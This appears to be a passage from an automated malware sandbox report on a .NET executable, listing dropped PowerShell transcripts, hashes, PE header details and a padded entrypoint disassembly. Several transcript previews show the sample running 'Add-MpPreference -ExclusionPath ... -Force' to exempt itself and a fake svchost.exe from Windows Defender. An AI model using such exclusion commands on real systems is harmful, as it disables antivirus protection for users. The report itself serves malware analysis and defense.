                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3800
                                                                                                  Entropy (8bit):5.3384674472509674
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZB/dN7aqDo1ZZm4Zg/dN7aqDo1ZfqMf0cf0cf0GZt:aTT9
                                                                                                  MD5:04019100B542393126B1B4C206A0A8A9
                                                                                                  SHA1:45C1A29197BBC2EA08ACDF5624C398A185C6496A
                                                                                                  SHA-256:31A63B4BA3048F16BC0B5305583C6532428FC8DB6A547E01BFA51159B6A8D305
                                                                                                  SHA-512:336C7809F676F7B6FAE6D34643E2C76AE80EE527B42D9867EA80992A1F09C6B67CBFD9A49F4E8713852DF4FC230F62AFF2AB8244996C03755FDB2478A04D3F6C
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161258..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe -Force..Process ID: 4840..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161258..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe -Force..**********************..Command start time: 2021
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.WgKkZP8O.20210915161259.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1908
                                                                                                  Entropy (8bit):5.328569130447471
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:BZev/doO+SsulIqDYB1Zusu04Zqv/doO+SsulIqDYB1ZA:BZS/dN7qqDo1Zy04Z2/dN7qqDo1ZA
                                                                                                  MD5:96FD5714BDA764615677C55862B30C71
                                                                                                  SHA1:38D3AF87EBC9128E5631EB6E147D69197F876818
                                                                                                  SHA-256:39E8D6654417A4185864D485E953D0CDF7375B830EFFBE0D3170A1D85669B269
                                                                                                  SHA-512:E249D4E9DB9E9EDA8634E8087D5F7A803C01194C937E67F5CC7D0E4BA1C7ED3B48296974580B3D78DA793EDB3232B1EFB1FC831B7A94CCF513DDB8FB14E89BCF
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161303..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe -Force..Process ID: 5968..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161303..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe -Force..**********************..Command start time: 2021
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.Y6uDcGdZ.20210915161140.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5795
                                                                                                  Entropy (8bit):5.3990618053567
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZT/dN0+1aqDo1Zw+KZh/dN0+1aqDo1Z/4+P++PQ+PjZf/dN0+1aqDo1ZQ5+PA+I:X5SF
                                                                                                  MD5:9AD9FF09EA6020DA5598CE85527E60B5
                                                                                                  SHA1:0895DCEA8EF60E61B26704A65C9A3D100FF79CD8
                                                                                                  SHA-256:C125E3345245351A1F2AF1577F5016554FCF04F572FDEF17E8AF4A827AE01E2A
                                                                                                  SHA-512:D262611B0EFDAF785022CB43E50493D1D3BD48BB2FC76ADDCBFBA4716D2BFF2D4FC81D98D4AA019B02D16C579530DC994D4109A6F5E85FF959DB82B8EE415113
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161142..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lKJbVguaav.exe -Force..Process ID: 2616..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161142..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lKJbVguaav.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915161438..Username: computer\user..RunAs User: computer\a
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.dh5SBumr.20210915161301.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1787
                                                                                                  Entropy (8bit):5.317468251504598
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:BZkv/doO+SXyqDYB1ZA99ZCv/doO+SXyqDYB1ZA:BZE/dN4qDo1ZC9Z+/dN4qDo1ZA
                                                                                                  MD5:74EB45D3CCE0DC6181CF1C01541FD33D
                                                                                                  SHA1:7B61BBED5950866B5D8158C7F899CC127132DA70
                                                                                                  SHA-256:A22B24FC9A7AC1327DE753A1F77E5A4AFD4AC11190EC26A81012D33334E07A48
                                                                                                  SHA-512:2AABB3AC99CE11C1536075B9B37450AC2DF71F354223FFEA377290B2BD638D3295C603185CAC60F28DA048B3EA1CF3DD4D9E528BCDBB616AE09F950401EB84D2
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161305..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\E59A6148\svchost.exe -Force..Process ID: 6660..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161305..**********************..PS>Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\E59A6148\svchost.exe -Force..**********************..Command start time: 20210915161508..**********************..PS>TerminatingError(Add-MpPref
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.jUr0FIc5.20210915161154.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3591
                                                                                                  Entropy (8bit):5.308982385738356
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZI/dNAqDo1Z+9ZZ/dNAqDo1ZHqr30c30c30UZ3:wrrJ
                                                                                                  MD5:133D0112B96A4DD1061FDFF4B1580BE5
                                                                                                  SHA1:98602000B2690D4FF291A2EF7EA74828694ECC7B
                                                                                                  SHA-256:E9BB4419E2F90E1A183BEA838BB3093B8B70483134C88C38C182C0A2FA657625
                                                                                                  SHA-512:77F78201AF03A9CB559331A2A4930EABDE67F44FADB3AF93FC17756352D7B7496AED08EA2B058A7171FD1BFA06F8D91942B8E2ED008655C4CA8C8C6D8A1378AC
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161158..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\E59A6148\svchost.exe -Force..Process ID: 6992..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161158..**********************..PS>Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\E59A6148\svchost.exe -Force..**********************..Command start time: 20210915161355..**********************..PS>TerminatingError(Add-MpPref
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.omxvttNV.20210915161253.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3800
                                                                                                  Entropy (8bit):5.335779684306599
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZr/dN7WdqDo1ZDu4ZV/dN7WdqDo1ZYqMf0cf0cf0OZZ:uisTTl
                                                                                                  MD5:D07618C6AF4BD882C019C8E7C825BD1C
                                                                                                  SHA1:87D9642913AD4AF7A3D11919E3E8C7E9AFA62BD0
                                                                                                  SHA-256:5049DB8452FC33E36A013321D5A25E8B85B16A301221712F294BEA2F7665673C
                                                                                                  SHA-512:151CAD5CBD4E87F7A93B27A819A44596040B81F924205D30C80949B591D5DA043BD77AF76BB11B8ECD8D14365AC683C01F6959A8A2EE6F1B0FB9B01F919EA14B
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161256..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe -Force..Process ID: 3108..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161256..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe -Force..**********************..Command start time: 2021
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.shlvG_Cr.20210915161146.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3800
                                                                                                  Entropy (8bit):5.3314453695432045
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZg/dN7JqDo1Z4W4Zo/dN7JqDo1ZyqMf0cf0cf0GZz:hTTn
                                                                                                  MD5:C36440E5E91B2E27B66F3527F264020D
                                                                                                  SHA1:C67A1BCAF6A167EB293E53AA08AEECE10402C559
                                                                                                  SHA-256:0329E94517E42BD6959CA153D9D72FF785AE85863879F672FC75CC4AB794E882
                                                                                                  SHA-512:634B29E4D073F89F003A4B3DE7D63C3792939DB69589C82925F8E2460A686C15F0CE761BB3B47EFA8AD62E18AC6CC07DCB41D5C79A29AB48D7EBF5B8E07E435B
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161147..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe -Force..Process ID: 3020..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161147..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe -Force..**********************..Command start time: 2021
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.tRwex4kM.20210915161147.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3800
                                                                                                  Entropy (8bit):5.331975902750914
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZu/dN7sqDo1Z0To4ZU/dN7sqDo1ZnqMf0cf0cf0HZc:u5TTJ
                                                                                                  MD5:18677FF04A9D63B6321EE684B75C9717
                                                                                                  SHA1:A0AEB7553DF8A8F22B2EA2CE931ADF92F4206374
                                                                                                  SHA-256:9795EF090C7570872FDC22374CF692C71722B4FBD05AEBB7DB14FF2FCA83F648
                                                                                                  SHA-512:9168A236150C97330072E22A0562F12535569517C6E73DF7AD094939B92997244177E642D5DAB7E4864B6AB89CED5EDA3AE8EEF5C1BAB308B5D63B511C4FD03A
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161149..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe -Force..Process ID: 6192..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161149..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7ADA33B7.exe -Force..**********************..Command start time: 2021
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.yYZmvm0B.20210915161155.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3591
                                                                                                  Entropy (8bit):5.309154009654226
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZI/dNKqDo1Z89ZL/dNKqDo1Zwqr30c30c30jbZVi:9rrYHi
                                                                                                  MD5:ED906ACF30035259C4F50D09D03375E4
                                                                                                  SHA1:D16D570B83CA061488F1B4C0508CD75BA913501F
                                                                                                  SHA-256:23DA964FE6D27A6AD00A26A4C14CBD1C5CD6B1067BB3760C39939D469421344F
                                                                                                  SHA-512:334147371F1AFDFDBF906319E5E367601509C6ED9728DF48478812FBAF0C470F9C46244407AF47984E987272A9B427D9B517DAD6C19F1AFAF3DBBB0CF3B2D179
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161158..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\E59A6148\svchost.exe -Force..Process ID: 6820..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161158..**********************..PS>Add-MpPreference -ExclusionPath C:\Program Files\Common Files\System\E59A6148\svchost.exe -Force..**********************..Command start time: 20210915161353..**********************..PS>TerminatingError(Add-MpPref
                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.216554.z8gC+7xP.20210915161149.txt
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5792
                                                                                                  Entropy (8bit):5.397724192166353
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:BZP/dN0+HqDo1ZT0+KZp/dN0+HqDo1Z+4+P++PQ+PjZn/dN0+HqDo1ZXF5+PA+PU:TF
                                                                                                  MD5:2B1E5757E527A6240236D4A49083F167
                                                                                                  SHA1:5E65EFF9C9FE529084DA3FEED32B4C9354B21E2B
                                                                                                  SHA-256:3EE3E31B018C0D571F38A55521EB0ADA16FC92607D3B05016A03DB82E8D64D2B
                                                                                                  SHA-512:913F52DA82B4A67F83401DA98B20603A00E3D77DFE43CF44A5834C45A09D61EEE41B6B3ADF7B663F6097F9B4F5FDB306B95A9E52ED85F411712D60610406E560
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915161151..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 216554 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lKJbVguaav.exe -Force..Process ID: 668..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915161151..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\lKJbVguaav.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915161405..Username: computer\user..RunAs User: computer\al
                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):55
                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log
                                                                                                  Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):906
                                                                                                  Entropy (8bit):3.1481813635224816
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:OaqdmuF3rlp+VNQv+kWReH4yJ7MNp+VNQ1:OaqdF76Vmv+AbFPVm1
                                                                                                  MD5:61BD993DC862002A67223637A4E554B1
                                                                                                  SHA1:1970F9A0370AB93FD5D71CD975281368EA5ED0C0
                                                                                                  SHA-256:1B016E548D853B3E4F011C433B836E4FF5BB3C0A03F9489DA2E62ADB734C99EB
                                                                                                  SHA-512:56F1F9F1A3F7F1E3D2A32EDA6CC80C20AE78E9C4905FFF6B3CA9DB67BDDA1F3DE64912E5455AA855444DA21D26991CBB9467F210E77AA6AE95EA09A7618B864C
                                                                                                  Malicious:false
                                                                                                  Reputation:unknown
                                                                                                  Preview: ........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. S.e.p. .. 1.5. .. 2.0.2.1. .1.6.:.1.2.:.3.8.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. W.e.d. .. S.e.p. .. 1.5. .. 2.0.2.1. .1.6.:.1.2.:.3.8.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):5.80731766715221
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                  File name:lKJbVguaav.exe
                                                                                                  File size:856022
                                                                                                  MD5:5f377de371a8e95acec9956303d6f032
                                                                                                  SHA1:4d36d918df8ff90c0327ef713cfa262591d93636
                                                                                                  SHA256:46eeda891d1ab66cb14c007a901cf167b9e80ed78d9af21889eea4be3eb55e09
                                                                                                  SHA512:f7766dbb768cd671ac7a2e99b78625352b2ba53504ce9baaf6545afb0d33d769218b117400bb1658a48b1b6a108f56cf29b2287c761c9c98f7d6f714d6c4b506
                                                                                                  SSDEEP:12288:rn8yLq+IYhqreG7zHRwpS/hCcpzfRJYL4wFcTEDCN:rn3L1IYh+Zdl/dpz4swFPDCN
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....q...............0.................. ... ....@.. .......................`............`................................

                                                                                                  File Icon

                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x4d0dbe
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:true
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                  Time Stamp:0xCA7188B4 [Tue Aug 17 15:03:16 2077 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Authenticode Signature

                                                                                                  Signature Valid:
                                                                                                  Signature Issuer:
                                                                                                  Signature Validation Error:
                                                                                                  Error Number:
                                                                                                  Not Before, Not After
                                                                                                    Subject Chain
                                                                                                      Version:
                                                                                                      Thumbprint MD5:
                                                                                                      Thumbprint SHA-1:
                                                                                                      Thumbprint SHA-256:
                                                                                                      Serial:

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
